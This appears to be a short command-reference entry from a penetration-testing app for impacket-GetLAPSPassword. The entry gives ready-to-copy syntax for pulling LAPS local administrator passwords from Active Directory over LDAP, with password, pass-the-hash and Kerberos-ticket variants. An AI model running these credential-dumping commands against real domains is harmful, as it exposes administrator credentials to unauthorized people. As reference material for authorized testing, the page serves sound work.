Impacket GetLAPSPassword

Retrieve LAPS managed local administrator passwords from Active Directory

Tool
impacket-GetLAPSPassword
Category
Credential Attacks / gMSA & LAPS
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-GetLAPSPassword '<domain>/<user>:<password>' -dc-ip '<ip>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-GetLAPSPassword -hashes ':<hash>' -dc-ip '<ip>' '<domain>/<user>'

Kerberos Ticket requires Kerberos ticket

impacket-GetLAPSPassword -k -no-pass -dc-ip '<ip>' '<domain>/<user>'

Examples

impacket-GetLAPSPassword 'CORP.LOCAL/user:password' -dc-ip '192.168.1.100'

Tags

impacket laps local-admin credential-dumping ldap